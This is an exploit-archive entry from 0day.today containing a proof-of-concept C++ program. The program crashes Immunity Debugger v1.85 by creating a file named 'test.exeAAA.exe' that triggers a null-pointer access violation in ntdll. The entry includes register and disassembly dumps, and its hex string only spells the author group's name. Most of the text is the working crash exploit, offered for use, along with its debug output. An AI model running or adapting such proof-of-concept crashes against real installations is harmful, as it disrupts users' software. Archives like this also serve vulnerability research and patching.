Immunity Debugger v1.85 32-bit Memmory Corruption

2012-06-07T00:00:00
ID 1337DAY-ID-18480
Type zdt
Reporter Ayrbyte
Modified 2012-06-07T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ////////////////////////////////////////////////////////////////////////////////
//Title: Immunity Debugger v1.85 32-bit Memmory Corruption
//Author: Ayrbyte
//Link: debugger.immunityinc.com
//Versi: v1.85
//Tested on: Windows 7
//Fb: facebook.com/Ayrbyte
//Greetz To : R31tuz, 3|_^^1x, XerkusR, Clan X-BX, and all CREMY Family
//
//    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
//   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
//  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
// ??   ??    %% $$$$  ||  ||     > ::    ;;
//      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
//    ______________>>Ayrbyte<<_______________
//   Gamerz From CREMY | CRazy Experience arMY
////////////////////////////////////////////////////////////////////////////////
//[register]
//EAX 00000000
//ECX 00000000
//EDX 0022DFE0
//EBX 0022DB70 ASCII ".exe"
//ESP 0022C0C4
//EBP 0022D864 ASCII "test.exe"
//ESI 0022DFB8 ASCII "C:\Users\R1d3Rw13c\Desktop\test.exeAAA.exe"
//EDI 0022DFDB ASCII ".exe"
//EIP 777E49F6 ntdll.777E49F6
//
//[diassembly]
//779349D4   test        ecx,3
//779349DA   je          779349F6
//779349DC   mov         al,byte ptr [ecx]
//779349DE   add         ecx,1
//779349E1   test        al,al
//779349E3   je          77934A2B
//779349E5   test        ecx,3
//779349EB   jne         779349DC
//779349ED   add         eax,0
//779349F0   lea         esp,[esp]
//779349F3   lea         esp,[esp]
//779349F6   mov         eax,dword ptr [ecx]; ECX=00000000 ds:[00000000]=??? <--NullPointer
//779349F8   mov         edx,7EFEFEFFh
//779349FD   add         edx,eax
//779349FF   xor         eax,0FFh
//77934A02   xor         eax,edx
//77934A04   add         ecx,4
//77934A07   test        eax,81010100h
//77934A0C   je          779349F6
//77934A0E   mov         eax,dword ptr [ecx-4]
//
//Unhandle exception in ImmunityDebugger.exe (NTDLL.DLL):0xC0000005: Access Violation
//immunity is not handle filename test.exeAAA, after .exe "AAA" is also as input,
//in offset 779349f6 eax,dword ptr [ecx]; ecx is 00000000 ds:[00000000]=??? <--NullPointer
//it makes program be crash 
////////////////////////////////////////////////////////////////////////////////

#include <iostream>
using namespace std;

char _isi[] =   "\x43\x52\x45\x4D\x59\x20\x7C\x20\x43\x52\x61\x7A\x79\x20"
                "\x45\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x20\x61\x72\x4D\x59";
int main(){
    //make file test.exeAAA.exe, run it on immunity debugger
    FILE *_file;
    #define _namefile "test.exeAAA.exe"
    _file = fopen(_namefile, "w");
    fputs(_isi, _file);
    fclose(_file);
    return 0;   
}



#  0day.today [2018-01-02]  #